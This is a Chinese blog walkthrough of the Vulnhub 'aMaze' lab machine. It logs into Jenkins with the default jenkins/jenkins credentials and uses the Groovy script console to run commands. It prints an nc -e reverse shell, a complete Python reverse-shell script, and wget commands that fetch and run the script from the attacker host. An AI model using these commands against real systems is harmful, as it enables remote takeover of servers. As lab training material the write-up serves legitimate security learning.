Vulnhub靶机:aMaze

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:aMaze(10.0.2.9)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/amaze-1,573/

二、信息收集

使用nmap主机发现靶机ip10.0.2.10

使用nmap端口扫描发现靶机开放端口:21、22、80、8000

80端口使用dirsearch爆破目录,发现一个登录界面

8000端口使用dirsearch爆破目录,每爆破出什么来,打开网站是Jenkins中间件登录界面


三、漏洞利用

jenkins中间件的漏洞网上很多,但尝试了一些poc,都不行。后面尝试弱口令

jenkins/jenkins成功登录。

点击系统管理,下拉找到脚本控制台,点击脚本控制台,执行并打印系统命令

复制代码
println "whoami".execute().text

使用nc反弹shell成功,root权限

复制代码
println "nc -e /bin/bash 10.0.2.15 8888".execute().text

还可以使用python提权,将python脚本通过web上传到靶机,启动nc监听8888端口,并运行

python 复制代码
#!/usr/bin/python
# This is a Python reverse shell script

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.0.2.15",8888));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/bash","-i"]);
复制代码
#在靶机执行命令
println "wget http://10.0.2.15/shell.py".execute().text
println "python3 shell.py".execute().text

寻找不到flag

相关推荐
张太行_14 小时前
网络SSL/TLS协议详解
网络·web安全·ssl
安全漏洞防治中心21 小时前
Roadmap:一年实现安全漏洞防治自动化
运维·web安全·网络安全·自动化·漏洞管理·漏洞处置sop·漏洞紧急修复建议
lingggggaaaa1 天前
小迪安全v2023学习笔记(七十讲)—— Python安全&SSTI模板注入&项目工具
笔记·python·学习·安全·web安全·网络安全·ssti
卓码软件测评2 天前
软件测试:如何利用Burp Suite进行高效WEB安全测试
网络·安全·web安全·可用性测试·安全性测试
黑客影儿2 天前
Go特有的安全漏洞及渗透测试利用方法(通俗易懂)
开发语言·后端·安全·web安全·网络安全·golang·系统安全
m0_738120723 天前
CTFshow系列——命令执行web38-40
前端·windows·安全·web安全
网络安全大学堂3 天前
【黑客技术零基础入门】PHP环境搭建、安装Apache、安装与配置MySQL(非常详细)零基础入门到精通,收藏这一篇就够
安全·web安全·计算机·网络安全·黑客·信息安全·程序员
卓码软件测评3 天前
【网站测试:CORS配置错误引发的安全风险及测试】
功能测试·安全·web安全·压力测试·可用性测试·安全性测试
XY_墨莲伊5 天前
【网络安全实验报告】实验六: 病毒防护实验
安全·web安全
lingggggaaaa5 天前
小迪安全v2023学习笔记(六十二讲)—— PHP框架反序列化
笔记·学习·安全·web安全·网络安全·php·反序列化